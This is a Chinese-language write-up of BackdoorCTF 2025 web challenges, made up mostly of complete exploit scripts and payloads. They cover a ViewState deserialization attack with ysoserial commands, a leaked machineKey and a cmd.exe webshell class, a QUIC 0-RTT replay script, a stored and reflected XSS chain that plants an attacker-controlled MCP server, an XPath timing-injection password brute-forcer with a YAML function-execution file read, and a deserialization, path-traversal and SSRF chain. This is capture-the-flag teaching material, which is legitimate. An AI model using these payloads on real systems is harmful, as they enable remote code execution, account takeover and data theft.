BackdoorCTF 2025 Writeup
Web
.net painwork | 已解出
- 正常手段似乎访问不到
admin.aspx,fuzz 了一下发现访问/%2f/admin.aspx即可绕过鉴权 HealthHandler里完全没对 URL 做过滤,可以使用file://任意读文件- 我们读取
web.config发现 MachineKey 泄露
<machineKey validation="SHA1" decryption="AES"
validationKey="AC4DCFDDF3BB46EC1506BD671BEE55D5666B7B0B"
decryptionKey="AB4298433692C6911B75665DEFA47AD09EA856BE41879334" />
- 这给了我们打 ViewState 反序列化的可能
- 题目版本是 .NET 4.8,该版本默认有类型检查,需要先用 ysoserial.net 的 ActivitySurrogateDisableTypeCheck gadget 去绕过一下。这一步回显 500 是完全正常的
Payload Gen:
ysoserial.exe -g ActivitySurrogateDisableTypeCheck -c "ignore" -p ViewState --validationalg="SHA1" --validationkey="AC4DCFDDF3BB46EC1506BD671BEE55D5666B7B0B" --decryptionalg="AES" --decryptionkey="AB4298433692C6911B75665DEFA47AD09EA856BE41879334" --apppath="/" --path="/login.aspx"
- 接着可以打一个简单的回显马
Payload Gen:
ysoserial.exe -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;./System.dll;./System.Web.dll" -p ViewState --validationalg="SHA1" --validationkey="AC4DCFDDF3BB46EC1506BD671BEE55D5666B7B0B" --decryptionalg="AES" --decryptionkey="AB4298433692C6911B75665DEFA47AD09EA856BE41879334" --apppath="/" --path="/login.aspx"
ExploitClass.cs:
class E
{
public E()
{
System.Web.HttpContext context = System.Web.HttpContext.Current;
context.Server.ClearError();
context.Response.Clear();
try
{
System.Diagnostics.Process process = new System.Diagnostics.Process();
process.StartInfo.FileName = "cmd.exe";
string cmd = context.Request.Form["cmd"];
process.StartInfo.Arguments = "/c " + cmd;
process.StartInfo.RedirectStandardOutput = true;
process.StartInfo.RedirectStandardError = true;
process.StartInfo.UseShellExecute = false;
process.Start();
string output = process.StandardOutput.ReadToEnd();
context.Response.Write(output);
} catch (System.Exception) {}
context.Response.Flush();
context.Response.End();
}
}
- 成功 RCE
Payload:
POST /login.aspx HTTP/1.1
Host: <chall_ip>
Content-Length: 16972
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=bg0jsfvngq1351zcaxntdc2p
Connection: keep-alive
cmd=dir+"c:\"&__VIEWSTATE=<Payload>
![[file-20251208162127821.png]]
Shop of life | 已解出
- 服务使用了 HTTP/3 QUIC,其支持 0-RTT
- 0-RTT 的早期数据可以被重放,可以重复 redeem 以获得余额
Exp:
import asyncio, ssl, json
from aioquic.asyncio.client import connect
from aioquic.asyncio.protocol import QuicConnectionProtocol
from aioquic.h3.connection import H3Connection, H3_ALPN
from aioquic.h3.events import HeadersReceived, DataReceived
from aioquic.quic.configuration import QuicConfiguration
from aioquic.quic import events
HOST = "104.198.24.52"
PORT = 6016
USER_ID = "Turker" # 可自定义任意 id
class H3Client(QuicConnectionProtocol):
def __init__(self, *a, **kw):
super().__init__(*a, **kw)
self.http = H3Connection(self._quic)
self.responses = {}
async def request(self, method, path, data=None, headers=None):
if headers is None: headers = []
sid = self._quic.get_next_available_stream_id(False)
fut = asyncio.get_running_loop().create_future()
self.responses[sid] = {"fut": fut, "headers": None, "body": bytearray(), "done": False}
hdrs = [
(b":method", method.encode()),
(b":scheme", b"https"),
(b":authority", HOST.encode()),
(b":path", path.encode()),
]
for k, v in headers:
hdrs.append((k if isinstance(k, bytes) else str(k).encode(),
v if isinstance(v, bytes) else str(v).encode()))
end = (data is None) or (len(data) == 0)
self.http.send_headers(sid, hdrs, end_stream=end)
if data:
if isinstance(data, str): data = data.encode()
self.http.send_data(sid, data, end_stream=True)
self.transmit()
return await fut
def _finish(self, sid):
info = self.responses.get(sid)
if info and info["done"] and not info["fut"].done():
hdr_dict = {k.decode(): v.decode() for k, v in (info["headers"] or [])}
status = int(hdr_dict.get(":status", "0") or 0)
info["fut"].set_result({"status": status, "headers": info["headers"], "body": bytes(info["body"])})
def quic_event_received(self, ev):
http_events = []
if isinstance(ev, (events.StreamDataReceived, events.DatagramFrameReceived)):
http_events = self.http.handle_event(ev)
elif isinstance(ev, events.ConnectionTerminated):
for info in self.responses.values():
if not info["fut"].done():
info["fut"].set_exception(ConnectionError(ev.reason_phrase))
for he in http_events:
if isinstance(he, HeadersReceived):
info = self.responses.get(he.stream_id)
if info:
info["headers"] = he.headers
if he.stream_ended:
info["done"] = True
self._finish(he.stream_id)
elif isinstance(he, DataReceived):
info = self.responses.get(he.stream_id)
if info:
info["body"].extend(he.data)
if he.stream_ended:
info["done"] = True
self._finish(he.stream_id)
async def get_session_ticket():
cfg = QuicConfiguration(is_client=True, alpn_protocols=H3_ALPN)
cfg.verify_mode = ssl.CERT_NONE
holder = {}
def save(t): holder["ticket"] = t
async with connect(HOST, PORT, configuration=cfg, create_protocol=H3Client,
session_ticket_handler=save) as c:
await c.request("GET", "/")
return holder.get("ticket")
async def redeem_once(uid):
cfg = QuicConfiguration(is_client=True, alpn_protocols=H3_ALPN)
cfg.verify_mode = ssl.CERT_NONE
async with connect(HOST, PORT, configuration=cfg, create_protocol=H3Client) as c:
return await c.request("POST", "/api/redeem",
json.dumps({"user_id": uid}),
[(b"content-type", b"application/json")])
async def redeem_0rtt(ticket, uid, times):
cfg = QuicConfiguration(is_client=True, alpn_protocols=H3_ALPN, session_ticket=ticket)
cfg.verify_mode = ssl.CERT_NONE
for i in range(times):
async with connect(HOST, PORT, configuration=cfg, create_protocol=H3Client,
wait_connected=False) as c:
resp = await c.request("POST", "/api/redeem",
json.dumps({"user_id": uid}),
[(b"content-type", b"application/json")])
print(f"[0-RTT #{i}] {resp['body'].decode().strip()}")
async def buy_flag(uid):
cfg = QuicConfiguration(is_client=True, alpn_protocols=H3_ALPN)
cfg.verify_mode = ssl.CERT_NONE
async with connect(HOST, PORT, configuration=cfg, create_protocol=H3Client) as c:
buy = await c.request("POST", "/api/buy",
json.dumps({"user_id": uid, "item": "flag"}),
[(b"content-type", b"application/json")])
inv = await c.request("GET", f"/api/inventory?user_id={uid}")
bal = await c.request("GET", f"/api/balance?user_id={uid}")
flag = await c.request("GET", f"/flag?user_id={uid}")
print("buy:", buy["body"].decode().strip())
print("inventory:", inv["body"].decode().strip())
print("balance:", bal["body"].decode().strip())
print("flag:", flag["body"].decode().strip())
async def main():
ticket = await get_session_ticket()
if not ticket:
raise SystemExit("无法获取 session ticket")
print("ticket obtained, exploiting 0-RTT replays...")
# 第一次正常 redeem 建立钱包
await redeem_once(USER_ID)
# 重放 0-RTT redeem 多次,每次 +100
await redeem_0rtt(ticket, USER_ID, times=6)
# 购买并拿 flag
await buy_flag(USER_ID)
if __name__ == "__main__":
asyncio.run(main())
MCP Mayhem | 已解出
- 我们的目标是通过恶意的 MCP 服务器拿到 flag。所以需要让
mcp_proxy知道恶意服务器的存在。 - 只有 Admin 才有权限添加新的 MCP 服务器,而它是通过 Bot 模拟的。
- 观察发现在
/client/call接口里,调用工具的错误信息会直接返回并通过前端的innerHTML渲染,有 Reflected XSS。但是这个接口位于client.challenge.com,而添加 MCP 服务器的逻辑位于challenge.com,存在跨域问题。 - 寻找位于
challenge.com的利用,发现在/register里description字段没有经过任何过滤,且在/profile页面通过{{ current_user.description|safe }}渲染,有一个 Stored XSS。 - 所以我们首先注册账号,在
description里写入恶意的 JS 代码,其功能是:- Fetch
/admin/csrf-token获取 Token。 - Post /
admin/mcp/add-server添加恶意服务器。
- Fetch
- 为了让 Bot 访问到我们的 Profile 而不是自己的,我们构造一个 Payload 发给 Bot ,其功能是:
- 设置 Cookie:
document.cookie = 'session=ATTACKER_SESSION; path=/profile; domain=challenge.com'。 - 跳转:
window.location = '/profile'。
- 设置 Cookie:
- 在 Cookie 冲突时,
path更长的会优先被使用,于是 Bot 访问到了我们恶意的 Profile,进而添加 MCP 服务器,获得 flag。
Exp:
import requests
import json
import random
import time
import sys
import jwt
import secrets
import base64
# Configuration
# Remote Challenge URL
WEB_URL = "http://104.198.24.52:6001"
# Remote Bot URL
BOT_URL = "http://104.198.24.52:6002"
# Evil Server URL (confirmed by user)
EVIL_SERVER_URL = "http://<YOUR_IP>"
# Host headers matching the server configuration
AUTH_HOST = "challenge.com:6001"
CLIENT_HOST = "client.challenge.com:6001"
# Internal URL used by the bot
TARGET_PROFILE_URL = "http://challenge.com:6001/profile"
def solve():
s = requests.Session()
# 1. Register Attacker on REMOTE server
username = f"hacker_{random.randint(1000, 9999)}"
password = "password"
print(f"[*] Registering user: {username} on {WEB_URL}")
# Use a random server name to avoid collisions/leftovers
server_name = f"srv_{random.randint(1000, 9999)}"
# Stored XSS Payload
# This runs on /profile when bot visits it.
# It fetches the CSRF token (using Admin's session, sent because path matches /admin)
# Then adds the evil server using the fetched token.
stored_payload = f"""
<script>
(async () => {{
try {{
// 1. Get CSRF Token
const r1 = await fetch('/admin/csrf-token');
if (!r1.ok) throw new Error('CSRF fetch failed');
const d1 = await r1.json();
const token = d1.csrf_token;
// 2. Add Evil Server
const r2 = await fetch('/admin/mcp/add-server', {{
method: 'POST',
headers: {{'Content-Type': 'application/json'}},
body: JSON.stringify({{
csrf_token: token,
name: "{server_name}",
url: "{EVIL_SERVER_URL}"
}})
}});
const t2 = await r2.text();
console.log("Add Server Result: " + t2);
}} catch (e) {{
console.error(e);
}}
}})();
</script>
"""
reg_data = {
"username": username,
"password": password,
"confirm_password": password,
"about": stored_payload
}
try:
r = s.post(f"{WEB_URL}/register", data=reg_data, headers={"Host": AUTH_HOST})
if r.status_code not in [200, 302]:
print(f"[-] Registration failed: {r.status_code} {r.text}")
# Try login anyway? No, need description injection.
except Exception as e:
print(f"[-] Connection failed: {e}")
return
# Login to get session cookie
s.post(f"{WEB_URL}/login", data={"username": username, "password": password}, headers={"Host": AUTH_HOST})
attacker_cookie = s.cookies.get("session")
if not attacker_cookie:
print("[-] Failed to obtain session cookie")
return
print(f"[*] Attacker Session: {attacker_cookie}")
# 2. Trigger Bot via Reflected XSS
print("[*] Triggering Bot...")
# Reflected XSS Payload:
# Sets cookie with path=/profile (Shadowing) to override Admin cookie on that page.
# Redirects to /profile to trigger Stored XSS.
# Use base64 encoding to avoid quoting issues in JSON transmission to Bot.
js_payload = f"document.cookie='session={attacker_cookie}; path=/profile; domain=challenge.com'; window.location='{TARGET_PROFILE_URL}';"
b64_payload = base64.b64encode(js_payload.encode()).decode()
reflected_payload = f"<img src=x onerror=eval(atob('{b64_payload}'))>"
print(f"[*] Payload: {reflected_payload}")
bot_data = {
"tool": "math_alpha_add",
"arguments": json.dumps({"a": reflected_payload, "b": 1})
}
try:
# Ensure this hits the remote bot
requests.post(f"{BOT_URL}/", data=bot_data)
print("[*] Bot triggered successfully")
except Exception as e:
print(f"[-] Bot trigger failed: {e}")
# 3. Wait for execution
# Bot sleeps 3s, plus network time. We wait 30s to be safe.
print("[*] Waiting for bot to execute payload (5s)...")
time.sleep(5)
# 4. Call Evil Tool to get Flag
evil_tool_name = f"{server_name}_steal_flag"
print(f"[*] Attempting to call evil tool: {evil_tool_name}")
tool_call_data = {
"tool": evil_tool_name,
"arguments": {}
}
# Call via client endpoint using attacker session (valid user)
r = s.post(f"{WEB_URL}/call", json=tool_call_data, headers={"Host": CLIENT_HOST})
print(f"[*] Result Status: {r.status_code}")
print(f"[*] Result Body: {r.text}")
if "flag" in r.text or "dev{" in r.text or "{" in r.text:
try:
res_json = r.json()
if "result" in res_json:
print(f"\n[+] FLAG: {res_json['result']}")
except:
pass
if __name__ == "__main__":
solve()
Trust Issues | 已解出
- 登录逻辑没对用户名做转义直接拼接进 XPath 查询,同时查询为真时会延时 2 秒。
const query = `//user[username/text()='${username}']`;
const userNode = xpath.select(query, xmlDoc)[0];
if (userNode) {
await new Promise(resolve => setTimeout(resolve, 2000));
}
- 构造用户名
admin' and CONDITION or 'a'=',即可测试 CONDITION 是否为真。 - 爆破 admin 密码之后,
/admin/create这里把用户提供的 YAML 用yaml.load解析,并把'' + parsed的结果回显。这里是允许!!js/function的。
Exp:
import json
import string
import sys
import time
import requests
from requests import Session
BASE_URL = "http://104.198.24.52:6014"
DEFAULT_CHARSET = string.ascii_letters + string.digits + "{}_!@#$%^&*()-=+[]:;,.?"
THRESHOLD = 1.5
MAX_LENGTH = 32
def xpath_char_literal(ch: str) -> str:
if ch == "'":
return '"\'"'
return f"'{ch}'"
def timing_oracle(session: Session, base: str, condition: str, threshold: float,
retries: int = 3) -> bool:
username = f"admin' and {condition} or 'a'='"
data = {"username": username, "password": "x"}
for attempt in range(1, retries + 1):
start = time.time()
try:
session.post(f"{base}/login", data=data, timeout=10)
except requests.RequestException:
if attempt == retries:
raise
time.sleep(0.5)
continue
elapsed = time.time() - start
return elapsed >= threshold
raise RuntimeError("Oracle retries exhausted")
def brute_force_password(session: Session, base: str, max_length: int,
charset: str, threshold: float) -> str:
print("[*] Determining password length...")
length = 0
for pos in range(1, max_length + 1):
cond = f"string-length(password/text())>={pos}"
if timing_oracle(session, base, cond, threshold):
length = pos
print(f" length >= {pos}")
else:
break
if length == 0:
raise RuntimeError("Failed to determine password length")
print(f"[+] Password length determined: {length}")
print("[*] Brute forcing password characters...")
result = []
for pos in range(1, length + 1):
for ch in charset:
cond = f"substring(password/text(),{pos},1)={xpath_char_literal(ch)}"
if timing_oracle(session, base, cond, threshold):
result.append(ch)
guess = "".join(result)
print(f" position {pos} => {ch!r} (partial: {guess})")
sys.stdout.flush()
break
else:
raise RuntimeError(f"Failed to find character at position {pos}")
password = "".join(result)
print(f"[+] Admin password recovered: {password}")
return password
def login_as_admin(session: Session, base: str, password: str) -> None:
resp = session.post(f"{base}/login", data={"username": "admin", "password": password},
allow_redirects=False)
if resp.status_code != 302 or "sid=" not in resp.headers.get("Set-Cookie", ""):
raise RuntimeError("Admin login failed")
print("[+] Logged in as admin")
def fetch_flag(session: Session, base: str) -> str:
file_content = """--- !!js/function >
function () {
const fs = process.mainModule.require('fs');
try {
return fs.readFileSync('/app/flag.txt', 'utf8');
} catch (e) {
return 'ERR:' + e.message;
}
}()
"""
payload = {"filename": "exploit.yml", "fileContent": file_content}
headers = {"Content-Type": "application/json"}
resp = session.post(f"{base}/admin/create", headers=headers, data=json.dumps(payload))
if resp.status_code != 200:
raise RuntimeError(f"YAML exploit failed (status {resp.status_code})")
data = resp.json()
if not data.get("success"):
raise RuntimeError(f"Server rejected payload: {data}")
result = data.get("result", "")
if result.startswith("ERR:"):
raise RuntimeError(f"Exploit executed but returned error: {result}")
print(f"[+] Flag response: {result.strip()}")
return result.strip()
def main():
session = requests.Session()
password = None
if not password:
password = brute_force_password(session, BASE_URL, MAX_LENGTH,
DEFAULT_CHARSET, THRESHOLD)
login_as_admin(session, BASE_URL, password)
flag = fetch_flag(session, BASE_URL)
print(f"[+] Final flag: {flag}")
if __name__ == "__main__":
main()
MarketFlow | 已解出
ObjectManager服务允许用户通过 JSON 数据中的_type字段实例化CLASS_REGISTRY中定义的任意类。- 通过构造恶意的
ReportConfiguration对象,我们可以利用AnalyticsProcessor->CacheConfiguration->PersistenceAdapter的链子。PersistenceAdapter类允许我们实现任意写。 TemplateRenderer拥有一个 Legacy Mode 。如果模板文件以.tpl结尾并包含特定头部,渲染器会解析@include:指令。我们在exploit.tpl中写入@include:../../../../flag,即可读到 flag。- 现在我们需要调用
/internal/cron/process来开始这个任务的处理。可以利用WebhookForwarder类的 SSRF ,使用 2130706433 绕过黑名单触发内部接口。
Exp:
import requests
import json
import time
import sys
# Target Configuration
BASE_URL = "http://34.10.220.48:6002"
USERNAME = "hacker"
PASSWORD = "password123"
EMAIL = "hacker@example.com"
# Setup session
s = requests.Session()
def register():
print("[*] Registering...")
res = s.post(f"{BASE_URL}/api/auth/register", json={
"username": USERNAME,
"password": PASSWORD,
"email": EMAIL
})
print(res.text)
def login():
print("[*] Logging in...")
res = s.post(f"{BASE_URL}/api/auth/login", json={
"username": USERNAME,
"password": PASSWORD
})
if "user_id" in res.text:
print("[+] Logged in successfully")
return True
print("[-] Login failed")
return False
def exploit():
# Step 1: Create the malicious task
# This task will:
# 1. Write 'exploit.tpl' to templates directory via CacheConfiguration/PersistenceAdapter
# 2. Render 'exploit.tpl' via TemplateSpecification (which includes the flag)
# 3. Save the result to 'exploit_result.html'
print("[*] Creating malicious task...")
payload = {
"_type": "ReportConfiguration",
"report_type": "exploit",
"date_range": "today",
"processor": {
"_type": "AnalyticsProcessor",
"data_source": "dummy",
"output_config": {
"_type": "CacheConfiguration",
"cache_key": "exploit_key",
"ttl": 3600,
"objects": [
"# -*- mode: legacy -*-",
"FLAG_START",
"@include:../../../../flag.txt",
"FLAG_END"
],
"persistence": {
"_type": "PersistenceAdapter",
"storage_path": "../templates/exploit.tpl",
"mode": "write"
}
}
},
"template": {
"_type": "TemplateSpecification",
"template_name": "exploit.tpl",
"output_path": "exploit_result.html"
}
}
res = s.post(f"{BASE_URL}/api/analytics/reports", json=payload)
print(f"Task creation response: {res.text}")
# Step 2: Trigger the scheduler via SSRF
# We use decimal IP for 127.0.0.1 to bypass checks: 2130706433
print("[*] Triggering scheduler via SSRF...")
forwarder_payload = {
"_type": "WebhookForwarder",
"target_url": "http://2130706433:5000/internal/cron/process",
"method": "POST"
}
res = s.post(f"{BASE_URL}/api/webhooks/forward", json=forwarder_payload)
print(f"SSRF response: {res.text}")
# Step 3: Fetch the flag
print("[*] Fetching flag...")
time.sleep(2) # Wait for processing
res = s.get(f"{BASE_URL}/reports/exploit_result.html")
if res.status_code == 200:
print(f"\n[+] FLAG FOUND: {res.text}")
else:
print(f"[-] Failed to get flag. Status: {res.status_code}")
print(res.text)
def main():
register()
if login():
exploit()
if __name__ == "__main__":
main()
No Sight Required | 已解出
- sqlmap 一把梭是什么意思?